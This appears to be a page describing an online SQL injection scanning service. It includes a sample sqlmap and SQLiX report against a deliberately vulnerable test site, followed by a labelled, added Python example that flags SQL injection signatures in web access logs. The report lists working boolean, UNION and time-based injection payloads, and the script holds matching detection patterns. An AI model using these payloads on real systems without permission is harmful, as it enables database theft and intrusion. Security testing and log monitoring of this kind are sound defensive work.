Entering a web address into the form will have that URL scanned by one of our external servers for HTTP GET based SQL injection. This type of vulnerability could allow backend database manipulation, access to customer data or even operating system access. A URL with parameters at the end is the type of URL tested by this scan:
For example: www.example.com?id=2&page=2
This URL will have the parameters id and page tested for SQL injection.

You must enter a public website address that is routable from an external perspective and one that you have permission to scan. The results will be emailed to you once the scan has completed.

It is possible, though highly unlikely, that this scan could cause listening services to become unstable. It will also generate a great deal of noise in the web logs of the server, as it will perform multiple SQL tests against each parameter using both the sqlmap and SQLiX tools.

The following is a sample SQL injection report:

HackerTarget.com - SQL Injection Test Sample Report

======================================================
-- SQLiX --
© Copyright 2006 Cedric COCHIN, All Rights Reserved.
======================================================

Analysing URL [http://testphp.vulnweb.com/artists.php?artist=1]
http://testphp.vulnweb.com/artists.php?artist=1
[+] working on artist
[+] Method: MS-SQL error message
[+] Method: SQL error message
[+] Method: MySQL comment injection
[ERROR] Parameter doesn't impact content
[+] Method: SQL Blind Integer Injection
[FOUND] Blind SQL Injection: Integer based
[FOUND] Database type: MySQL Server
[INFO] Current function: version()
[INFO] length: 31

5.0____________________________
5.0________________________-log
5.0____Debian______________-log
5.0.___Debian______________-log
5.0.2__Debian______________-log
5.0.22_Debian______________-log
5.0.22-Debian______________-log
5.0.22-Debian______________-log
5.0.22-Debian_0____________-log
5.0.22-Debian_0u___________-log
5.0.22-Debian_0ub__________-log
5.0.22-Debian_0ubu_________-log
5.0.22-Debian_0ubun________-log
5.0.22-Debian_0ubunt_______-log
5.0.22-Debian_0ubuntu______-log
5.0.22-Debian_0ubuntu6_____-log
5.0.22-Debian_0ubuntu6.____-log
5.0.22-Debian_0ubuntu6.0___-log
5.0.22-Debian_0ubuntu6.06__-log
5.0.22-Debian_0ubuntu6.06._-log
5.0.22-Debian_0ubuntu6.06.6-log

[FOUND] SQL Blind Integer Injection
--- No results here means that SQLiX found no injection point ---


--- Now sqlmap will test your url ---

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 09:04:35

[09:04:36] [INFO] using '/opt/sqlmap/output/testphp.vulnweb.com/session' as session file
[09:04:36] [INFO] testing connection to the target url
[09:04:37] [INFO] testing if the url is stable, wait a few seconds
[09:04:38] [INFO] url is stable
[09:04:38] [INFO] testing if GET parameter 'artist' is dynamic
[09:04:38] [INFO] confirming that GET parameter 'artist' is dynamic
[09:04:39] [INFO] GET parameter 'artist' is dynamic
[09:04:39] [INFO] heuristic test shows that GET parameter 'artist' might be injectable (possible DBMS: MySQL)
[09:04:39] [INFO] testing sql injection on GET parameter 'artist'
[09:04:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:04:40] [INFO] GET parameter 'artist' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[09:04:40] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[09:04:41] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[09:04:41] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[09:04:52] [INFO] GET parameter 'artist' is 'MySQL > 5.0.11 AND time-based blind' injectable
[09:04:52] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[09:04:55] [INFO] target url appears to be UNION injectable with 3 columns
[09:04:56] [INFO] GET parameter 'artist' is 'MySQL UNION query (NULL) - 1 to 10 columns' injectable
GET parameter 'artist' is vulnerable. Do you want to keep testing the others? [y/N] N
sqlmap identified the following injection points with a total of 23 HTTP(s) requests:
---
Place: GET
Parameter: artist
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: artist=2 AND 683=683

Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: artist=-743 UNION ALL SELECT NULL, CONCAT(CHAR(58,105,117,110,58),IFNULL(CAST(CHAR(67,106,71,66,118,97,119,68,106,119) AS CHAR),CHAR(32)),CHAR(58,100,107,122,58)), NULL#

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: artist=2 AND SLEEP(5)
---

[09:05:16] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5.0.11
[09:05:16] [INFO] Fetched data logged to text files under '/opt/sqlmap/output/testphp.vulnweb.com'

[*] shutting down at: 09:05:16
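
The web-log noise mentioned earlier can be reviewed after a scan. The following is an added example, not part of the original page or of the scanning service: it checks access-log lines for the three payload types listed in the sample report above. The log lines, IP addresses, timestamps and the `scan_access_log` function are constructed for illustration and assume the common/combined log format.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Signatures modelled on the three payload types in the sample report.
SIGNATURES = {
    "boolean-based blind": re.compile(r"\b(?:AND|OR)\s+(\d+)\s*=\s*\1\b", re.I),
    "time-based blind": re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I),
    "UNION query": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
}

# Common/combined log format: client IP ... [time] "METHOD target PROTOCOL"
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|HEAD) (\S+) [^"]*"')

# Constructed sample log lines (documentation IP ranges, made-up timestamps).
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Oct/2011:09:04:30 +0000] "GET /artists.php?artist=1 HTTP/1.1" 200 5213',
    '203.0.113.10 - - [10/Oct/2011:09:04:39 +0000] "GET /artists.php?artist=2%20AND%20683%3D683 HTTP/1.1" 200 5213',
    '203.0.113.10 - - [10/Oct/2011:09:04:41 +0000] "GET /artists.php?artist=2+AND+SLEEP(5) HTTP/1.1" 200 5213',
    '203.0.113.10 - - [10/Oct/2011:09:04:55 +0000] "GET /artists.php?artist=-743%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 HTTP/1.1" 200 4870',
]

def scan_access_log(lines):
    """Return {(client, path, parameter): set of matched technique names}."""
    hits = defaultdict(set)
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue  # not a GET/HEAD request line in the expected format
        client, target = m.groups()
        parts = urlsplit(target)
        # parse_qsl percent-decodes values, so encoded payloads still match.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            for technique, pattern in SIGNATURES.items():
                if pattern.search(value):
                    hits[(client, parts.path, name)].add(technique)
    return dict(hits)

if __name__ == "__main__":
    for (client, path, param), techniques in scan_access_log(SAMPLE_LOG).items():
        print(f"{client} probed {path} parameter '{param}': {sorted(techniques)}")
```

Several distinct techniques from one client against one parameter within seconds is the pattern an automated scan leaves; a single match on its own may be ordinary traffic.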